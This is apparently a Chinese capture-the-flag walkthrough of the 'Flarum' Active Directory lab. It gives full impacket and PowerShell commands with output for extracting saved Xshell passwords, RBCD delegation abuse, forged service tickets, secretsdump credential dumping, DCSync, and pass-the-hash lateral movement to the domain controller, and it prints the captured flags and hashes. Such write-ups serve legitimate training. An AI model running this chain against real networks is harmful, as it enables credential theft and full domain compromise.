利用SharpXDecrypt.exe这个工具提取xshell存储的密码

SharpXDecrypt.exe

Xshell全版本凭证一键导出工具!(支持Xshell 7.0+版本)
Author: 0pen1
Github: https://github.com/JDArmy
[!] WARNING: For learning purposes only,please delete it within 24 hours after downloading!

[*] Start GetUserPath....
  UserPath: C:\Users\wangyun\Documents\NetSarang Computer\7
[*] Get UserPath Success !

[*] Start GetUserSID....
  Username: wangyun
  userSID: S-1-5-21-3535393121-624993632-895678587-1107
[*] GetUserSID Success !

  XSHPath: C:\Users\wangyun\Documents\NetSarang Computer\7\Xshell\Sessions\SSH.xsh
  Host: 172.22.60.45
  UserName: zhangxin
  Password: admin4qwY38cc
  Version: 7.1

[*] read done!

发现zhangxin用户，也利用这个账号密码做一下信息收集，跑一下bloodhound

zhangxin@xiaorang.lab/admin4qwY38cc

proxychains bloodhound-python -u zhangxin -p admin4qwY38cc -d xiaorang.lab -c all -ns 172.22.60.8 --zip --dns-tcp

RBCD

impacket

发现zhangxin用户是ACCOUNT OPERATORS组的，可以打RBCD

添加机器账号

proxychains4 impacket-addcomputer xiaorang.lab/zhangxin:'admin4qwY38cc' -dc-ip 172.22.60.8 -dc-host xiaorang.lab -computer-name 'hacker$' -computer-pass '0x401@admin'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 
[proxychains] Strict chain  ...  127.0.0.1:55556  ...  172.22.60.8:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:55556  ...  172.22.60.8:445  ...  OK
[*] Successfully added machine account hacker$ with password 0x401@admin.

修改msDS-AllowedToActOnBehalfOfOtherIdentity

proxychains4 impacket-rbcd xiaorang.lab/zhangxin:'admin4qwY38cc' -dc-ip 172.22.60.8 -action write -delegate-to 'Fileserver$' -delegate-from 'hacker$'

Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 
[proxychains] Strict chain  ...  127.0.0.1:55556  ...  172.22.60.8:389  ...  OK
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] hacker$ can now impersonate users on Fileserver$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     hacker$      (S-1-5-21-3535393121-624993632-895678587-1116)

申请银票据

proxychains -q impacket-getST xiaorang.lab/'hacker$':'Password@973' -spn cifs/Fileserver.xiaorang.lab -impersonate Administrator -dc-ip 172.22.60.8
proxychains4 impacket-getST xiaorang.lab/'hacker$':'0x401@admin' -spn cifs/Fileserver.xiaorang.lab -impersonate Administrator -dc-ip 172.22.60.8

Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[proxychains] Strict chain  ...  127.0.0.1:55556  ...  172.22.60.8:88  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:55556  ...  172.22.60.8:88  ...  OK
[*] Impersonating Administrator
[*] Requesting S4U2self
[proxychains] Strict chain  ...  127.0.0.1:55556  ...  172.22.60.8:88  ...  OK
[*] Requesting S4U2Proxy
[proxychains] Strict chain  ...  127.0.0.1:55556  ...  172.22.60.8:88  ...  OK
[*] Saving ticket in Administrator@cifs_Fileserver.xiaorang.lab@XIAORANG.LAB.ccache

导入票据

export KRB5CCNAME=Administrator@cifs_Fileserver.xiaorang.lab@XIAORANG.LAB.ccache

修改/etc/hosts

172.22.60.15 PC1.xiaorang.lab
172.22.60.42 FILESERVER.xiaorang.lab
172.22.60.8  XIAORANG\DC

psexec无密码连上FILESERVER，拿到SYSTEM权限(psexec自带提权效果)

proxychains4 impacket-psexec Administrator@FILESERVER.xiaorang.lab -k -no-pass -dc-ip 172.22.60.8 -codec gbk

C:\Users\Administrator\flag> type flag03.txt
 ________  __                                        
|_   __  |[  |                                       
  | |_ \_| | |  ,--.   _ .--.  __   _   _ .--..--.   
  |  _|    | | `'_\ : [ `/'`\][  | | | [ `.-. .-. |  
 _| |_     | | // | |, | |     | \_/ |, | | | | | |  
|_____|   [___]\'-;__/[___]    '.__.'_/[___||__||__] 

flag03: flag{461b6192-5a62-4aff-ab7a-795c5f9697a6}

Kevin-Robertson

接下来打RBCD，参考域渗透之委派攻击全集里的Acount Operators组用户拿下主机。

这里利用过程除了我们之前用过的powerview.ps1多了一个Powermad.ps1：https://github.com/Kevin-Robertson/Powermad/blob/master/Powermad.ps1

按下面配置：

PS C:\Users\zhangxin\Desktop> Set-ExecutionPolicy Bypass -Scope Process

执行策略更改
执行策略可帮助你防止执行不信任的脚本。更改执行策略可能会产生安全风险，如
https:/go.microsoft.com/fwlink/?LinkID=135170 中的 about_Execution_Policies 帮助主题所述。是否要更改执行策略?
[Y] 是(Y)  [A] 全是(A)  [N] 否(N)  [L] 全否(L)  [S] 暂停(S)  [?] 帮助 (默认值为“N”): Y
PS C:\Users\zhangxin\Desktop> import-module .\Powermad.ps1
PS C:\Users\zhangxin\Desktop> New-MachineAccount -MachineAccount test -Password $(ConvertTo-SecureString "123456" -AsPlainText -Force)
[+] Machine account test added
PS C:\Users\zhangxin\Desktop> import-module .\powerview.ps1
PS C:\Users\zhangxin\Desktop> Get-NetComputer test -Properties objectsid

objectsid
---------
S-1-5-21-3535393121-624993632-895678587-1117


PS C:\Users\zhangxin\Desktop> $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3535393121-624993632-895678587-1117)"
PS C:\Users\zhangxin\Desktop> $SDBytes = New-Object byte[] ($SD.BinaryLength)
PS C:\Users\zhangxin\Desktop> $SD.GetBinaryForm($SDBytes, 0)
PS C:\Users\zhangxin\Desktop> Get-DomainComputer Fileserver| Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
详细信息: [Get-DomainSearcher] search string: LDAP://DC.xiaorang.lab/DC=xiaorang,DC=lab
详细信息: [Get-DomainObject] Get-DomainObject filter string:
(&(|(distinguishedname=CN=FILESERVER,CN=Computers,DC=xiaorang,DC=lab)))
详细信息: [Set-DomainObject] Setting 'msds-allowedtoactonbehalfofotheridentity' to '1 0 4 128 20 0 0 0 0 0 0 0 0 0 0
 0 36 0 0 0 1 2 0 0 0 0 0 5 32 0 0 0 32 2 0 0 2 0 44 0 1 0 0 0 0 0 36 0 255 1 15 0 1 5 0 0 0 0 0 5 21 0 0 0 97 209
185 210 96 165 64 37 123 248 98 53 93 4 0 0' for object 'FILESERVER$'
PS C:\Users\zhangxin\Desktop>

配完了记得改本地的/etc/hosts，不然连不上去

这一套流程同样能打PC1上的flag2的，因为我们用户组能改非域控的所有机器，但这样比较蠢，毕竟打完FILESERVER下一步都能拿域控了，后面横传flag2就行了

flag4

请尝试利用黑客留下的域控制器后门获取域控的权限。

DCSync

FILESERVER.XIAORANG.LAB有DCSync权限，也就是题目描述里面说到的后门，抓一下FILESERVER的哈希

直接secretsdump导出SYSTEM的hash

proxychains4 impacket-secretsdump -k -no-pass FILESERVER.xiaorang.lab -dc-ip 172.22.60.8

Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[proxychains] Strict chain  ...  127.0.0.1:55556  ...  172.22.60.42:445  ...  OK
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xef418f88c0327e5815e32083619efdf5
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bd8e2e150f44ea79fff5034cad4539fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:b40dda6fd91a2212d118d83e94b61b11:::
[*] Dumping cached domain logon information (domain/username:hash)
XIAORANG.LAB/Administrator:$DCC2$10240#Administrator#f9224930044d24598d509aeb1a015766: (2023-08-02 07:52:21+00:00)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
XIAORANG\Fileserver$:plain_password_hex:3000310078005b003b0049004e003500450067003e00300039003f0074006c00630024003500450023002800220076003c004b0057005e0063006b005100580024007300620053002e0038002c0060003e00420021007200230030003700470051007200640054004e0078006000510070003300310074006d006b004c002e002f0059003b003f0059002a005d002900640040005b0071007a0070005d004000730066006f003b0042002300210022007400670045006d0023002a002800330073002c00320063004400720032002f003d0078006a002700550066006e002f003a002a0077006f0078002e0066003300
XIAORANG\Fileserver$:aad3b435b51404eeaad3b435b51404ee:951d8a9265dfb652f42e5c8c497d70dc:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x15367c548c55ac098c599b20b71d1c86a2c1f610
dpapi_userkey:0x28a7796c724094930fc4a3c5a099d0b89dccd6d1
[*] NL$KM 
 0000   8B 14 51 59 D7 67 45 80  9F 4A 54 4C 0D E1 D3 29   ..QY.gE..JTL...)
 0010   3E B6 CC 22 FF B7 C5 74  7F E4 B0 AD E7 FA 90 0D   >.."...t........
 0020   1B 77 20 D5 A6 67 31 E9  9E 38 DD 95 B0 60 32 C4   .w ..g1..8...`2.
 0030   BE 8E 72 4D 0D 90 01 7F  01 30 AC D7 F8 4C 2B 4A   ..rM.....0...L+J
NL$KM:8b145159d76745809f4a544c0de1d3293eb6cc22ffb7c5747fe4b0ade7fa900d1b7720d5a66731e99e38dd95b06032c4be8e724d0d90017f0130acd7f84c2b4a
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

接下来用Fileserver机器账户进行DCSync，dump域控哈希

proxychains4 impacket-secretsdump xiaorang.lab/'Fileserver$':@172.22.60.8 -hashes ':951d8a9265dfb652f42e5c8c497d70dc' -just-dc-user Administrator

Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[proxychains] Strict chain  ...  127.0.0.1:55556  ...  172.22.60.8:445  ...  OK
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[proxychains] Strict chain  ...  127.0.0.1:55556  ...  172.22.60.8:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:55556  ...  172.22.60.8:49668  ...  OK
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c3cfdc08527ec4ab6aa3e630e79d349b:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:4502e83276d2275a8f22a0be848aee62471ba26d29e0a01e2e09ddda4ceea683
Administrator:aes128-cts-hmac-sha1-96:38496df9a109710192750f2fbdbe45b9
Administrator:des-cbc-md5:f72a9889a18cc408
[*] Cleaning up...

pth横向DC，还有更多PTH方法，参考文章：域渗透基础 - 重庆森林不在重庆

proxychains4 impacket-smbexec -hashes :c3cfdc08527ec4ab6aa3e630e79d349b xiaorang.lab/administrator@172.22.60.8 -codec gbk
      C:\Windows\system32>type c:\users\administrator\flag\flag04.txt
 :::===== :::      :::====  :::====  :::  === :::======= 
 :::      :::      :::  === :::  === :::  === ::: === ===
 ======   ===      ======== =======  ===  === === === ===
 ===      ===      ===  === === ===  ===  === ===     ===
 ===      ======== ===  === ===  ===  ======  ===     ===

flag04: flag{56fae579-d874-4758-aec9-cbf374ceece9}

flag2

通过kerberos攻击的获取域内权限，并进行信息收集。

横向PC1

proxychains4 impacket-smbexec -hashes :c3cfdc08527ec4ab6aa3e630e79d349b xiaorang.lab/administrator@172.22.60.15 -codec gbk
      
      C:\Windows\system32>type c:\users\administrator\flag\flag02.txt
d88888b db       .d8b.  d8888b. db    db .88b  d88. 
88'     88      d8' `8b 88  `8D 88    88 88'YbdP`88 
88ooo   88      88ooo88 88oobY' 88    88 88  88  88 
88~~~   88      88~~~88 88`8b   88    88 88  88  88 
88      88booo. 88   88 88 `88. 88b  d88 88  88  88 
YP      Y88888P YP   YP 88   YD ~Y8888P' YP  YP  YP 

flag02: flag{f12e1239-d4ce-4351-9f93-2f6a04d4ee8b}

参考文章

春秋云镜Flarum | P4tt0n’s b10g

春秋云境·Flarum – fushulingのblog

春秋云境-Flarum | ta0的小站

内网打靶——春秋云镜篇(7)–Flarum-先知社区